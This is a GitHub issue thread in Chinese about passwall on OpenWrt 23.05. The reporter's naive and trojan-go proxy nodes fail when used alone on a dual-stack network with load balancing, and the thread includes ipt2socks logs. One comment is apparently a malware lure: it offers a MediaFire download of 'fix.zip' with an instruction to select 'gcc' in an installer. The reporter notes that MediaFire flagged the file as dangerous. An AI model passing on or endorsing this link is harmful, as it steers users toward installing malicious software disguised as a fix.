### ISSUE TITLE
[Bug]: 单独使用节点不可以科学上网，使用“xray/sing-box分流”使用这些节点可以科学上网。

### ISSUE THREAD

**Issue by nowfire2024** [xiaorouji/openwrt-package#3381]
### 描述您遇到的bug

我不知道是不是bug。但我遇到这个问题，一直无法解决。
1、我是ipv4，ipv6的双栈环境，openwrt 23.5.4并使用了mwan3负载均衡。
2、我使用一个naive节点、一个trojan-go（trojan plus）节点。如果分别将其单独设置tcp节点（udp与tcp同），google、githube测试都可以通过，但无法科学上网。
3、使用xray、sing-box分流的方式使用这些节点，可以科学上网。
4、sing-box或者xray协议下使用这个trojan-go节点，并单独设置tcp节点（udp与tcp同），又可以科学上网。
不知道设置哪里有问题。

### 复现此Bug的步骤

我怀疑是这些节点的客户端，无法使用双栈环境。

### 您想要实现的目的

可以单独使用节点上网。

### 日志信息

[1;32m2024-08-26 07:04:04 INF:[0m [main] server address: 127.0.0.1#2080
[1;32m2024-08-26 07:04:04 INF:[0m [main] listen address: 0.0.0.0#1041
[1;32m2024-08-26 07:04:04 INF:[0m [main] listen address: ::1#1041
[1;32m2024-08-26 07:04:04 INF:[0m [main] udp session cache capacity: 256
[1;32m2024-08-26 07:04:04 INF:[0m [main] udp session idle timeout: 60
[1;32m2024-08-26 07:04:04 INF:[0m [main] number of worker threads: 1
[1;32m2024-08-26 07:04:04 INF:[0m [main] max file descriptor limit: 65535
[1;32m2024-08-26 07:04:04 INF:[0m [main] enable tcp transparent proxy
[1;32m2024-08-26 07:04:04 INF:[0m [main] enable udp transparent proxy
[1;32m2024-08-26 07:04:04 INF:[0m [main] verbose mode (affect performance)
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_tproxy_accept_cb] source socket address: 10.0.0.34#39562
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_tproxy_accept_cb] target socket address: 44.238.10.22#80
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_tproxy_accept_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_socks5_recv_proxyresp_cb] tunnel is ready, start forwarding ...
[1;32m2024-08-26 07:04:16 INF:[0m [tcp_stream_payload_forward_cb] recv FIN from client stream, release ctx
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_tproxy_accept_cb] source socket address: 10.0.0.22#52011
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_tproxy_accept_cb] target socket address: 23.215.7.8#443
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_tproxy_accept_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;32m2024-08-26 07:04:23 INF:[0m [tcp_socks5_recv_proxyresp_cb] tunnel is ready, start forwarding ...
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_tproxy_accept_cb] source socket address: 10.0.0.34#60720
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_tproxy_accept_cb] target socket address: 52.10.134.54#80
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_tproxy_accept_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_socks5_recv_proxyresp_cb] tunnel is ready, start forwarding ...
[1;32m2024-08-26 07:04:24 INF:[0m [tcp_stream_payload_forward_cb] recv FIN from client stream, release ctx
[1;32m2024-08-26 07:04:24 INF:[0m [udp_tproxy_recvmsg_cb] recv from 10.0.0.34#47390, nrecv:72
[1;32m2024-08-26 07:04:24 INF:[0m [udp_tproxy_recvmsg_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:24 INF:[0m [udp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:24 INF:[0m [udp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:24 INF:[0m [udp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:24 INF:[0m [udp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:24 INF:[0m [udp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;35m2024-08-26 07:04:24 ERR:[0m [udp_socks5_recv_proxyresp_cb] response.respcode:0x7(Command not supported) != SUCCEEDED
[1;32m2024-08-26 07:04:24 INF:[0m [udp_socks5_context_timeout_cb] context will be released, reason: manual
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_tproxy_accept_cb] source socket address: 10.0.0.34#39566
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_tproxy_accept_cb] target socket address: 44.238.10.22#80
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_tproxy_accept_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_socks5_recv_proxyresp_cb] tunnel is ready, start forwarding ...
[1;32m2024-08-26 07:04:34 INF:[0m [tcp_stream_payload_forward_cb] recv FIN from client stream, release ctx
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_tproxy_accept_cb] source socket address: 10.0.0.22#52020
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_tproxy_accept_cb] target socket address: 204.79.197.222#443
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_tproxy_accept_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;32m2024-08-26 07:04:41 INF:[0m [tcp_socks5_recv_proxyresp_cb] tunnel is ready, start forwarding ...
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_tproxy_accept_cb] source socket address: 10.0.0.34#60724
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_tproxy_accept_cb] target socket address: 52.10.134.54#80
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_tproxy_accept_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_socks5_recv_proxyresp_cb] tunnel is ready, start forwarding ...
[1;32m2024-08-26 07:04:42 INF:[0m [tcp_stream_payload_forward_cb] recv FIN from client stream, release ctx
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_tproxy_accept_cb] source socket address: 10.0.0.34#39570
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_tproxy_accept_cb] target socket address: 44.238.10.22#80
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_tproxy_accept_cb] try to connect to 127.0.0.1#2080 ...
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_socks5_connect_cb] connect to 127.0.0.1#2080 succeeded
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_socks5_send_authreq_cb] send to 127.0.0.1#2080, nsend:3
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_socks5_recv_authresp_cb] recv from 127.0.0.1#2080, nrecv:2
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_socks5_recv_authresp_cb] send to 127.0.0.1#2080, nsend:10
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_socks5_recv_proxyresp_cb] recv from 127.0.0.1#2080, nrecv:10
[1;32m2024-08-26 07:04:48 INF:[0m [tcp_socks5_recv_proxyresp_cb] tunnel is ready, start forwarding ...
[1;32m2024-08-26 07:04:49 INF:[0m [tcp_stream_payload_forward_cb] recv FIN from client stream, release ctx

### 截图

![屏幕截图 2024-08-26 070455](https://github.com/user-attachments/assets/cac6e47f-2cee-44c2-b066-4ff9cb6e75ab)

### 系统相关信息

passwall  4.78-1
openwrt 23.05.4 amd64。
chrome 127.0.6533.122
windows 11

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by nowfire2024** [comment]
> Download https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file In the installer menu, select "gcc."

The file you attempted to download was determined to be dangerous. For your protection, MediaFire does not enable distribution of dangerous files.

**Comment by shaw21003** [comment]
同样问题
